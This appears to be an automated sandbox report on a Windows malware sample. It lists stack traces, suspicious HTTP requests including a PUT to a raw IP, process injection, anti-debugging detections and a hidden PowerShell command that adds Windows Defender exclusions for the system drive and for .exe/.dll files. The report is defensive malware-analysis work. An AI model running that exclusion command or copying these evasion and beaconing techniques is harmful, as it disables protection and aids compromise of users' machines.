log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143

exception.instruction_r: 8b 10 8b 45 08 01 d0 89 45 f0 8b 45 e8 8b 55 dc
exception.symbol: symbol_enumerate_module+0x4c symbol-0xc9
exception.instruction: mov edx, dword ptr [eax]
exception.module: monitor-x86.dll
exception.exception_code: 0xc0000005
exception.offset: 49663
exception.address: 0x746ac1ff
registers.esp: 38284744
registers.edi: 38285340
registers.eax: 622722902
registers.ebp: 38284816
registers.edx: 0
registers.ebx: 430
registers.esi: 2005598531
registers.ecx: 1361969152

__exception__

July 31, 2023, 5:28 p.m.

stacktrace:

symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143

exception.instruction_r: 8b 10 8b 45 08 01 d0 89 45 f0 8b 45 e8 8b 55 dc
exception.symbol: symbol_enumerate_module+0x4c symbol-0xc9
exception.instruction: mov edx, dword ptr [eax]
exception.module: monitor-x86.dll
exception.exception_code: 0xc0000005
exception.offset: 49663
exception.address: 0x746ac1ff
registers.esp: 3156800
registers.edi: 3157396
registers.eax: 622722902
registers.ebp: 3156872
registers.edx: 0
registers.ebx: 430
registers.esi: 2005598531
registers.ecx: 1361969152

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

PUT http://46.29.235.84/clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys

Performs some HTTP requests (5 events)

request	GET http://www.microsoft.com/
request	GET http://ip-api.com/json/?fields=query,status,countryCode,city,timezone
request	GET http://pastebin.com/raw/r0KhEEzi
request	PUT http://46.29.235.84/clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys
request	GET https://pastebin.com/raw/r0KhEEzi

Allocates read-write-execute memory (usually to unpack itself) (50 out of 307 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bda000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2084 region_size: 1208320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76bd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x746d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73411000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73da1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e24000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e61000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02971000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02972000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02237000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c61000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02235000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02223000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02224000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02226000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02227000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02228000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02229000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2023, 5:29 p.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

ip-api.com

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 31, 2023, 5:29 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00124200', u'virtual_address': u'0x00027000', u'entropy': 7.20189935333058, u'name': u'.teext', u'virtual_size': u'0x001241a4'}

entropy

7.20189935333

description

A section with a high entropy has been found

entropy

0.346735905045

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 31, 2023, 5:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 31, 2023, 5:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 5b28aaba5be420f829071a00cdbbb2756f87f539

Communicates with host for which no DNS query was performed (4 events)

host	185.149.146.118
host	185.159.129.168
host	46.29.235.84
host	77.91.77.144

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 region_size: 1208320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000c8	1	0	0

Manipulates memory of a non-child process indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2084 manipulating memory of non-child process 2192
NtAllocateVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 region_size: 1208320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000c8	1	0	0
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 2 (PAGE_READONLY) base_address: 0x00400000 process_handle: 0x000000c8	1	0	0
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 925696 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00401000 process_handle: 0x000000c8	1	0	0
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 233472 protection: 2 (PAGE_READONLY) base_address: 0x004e3000 process_handle: 0x000000c8	1	0	0
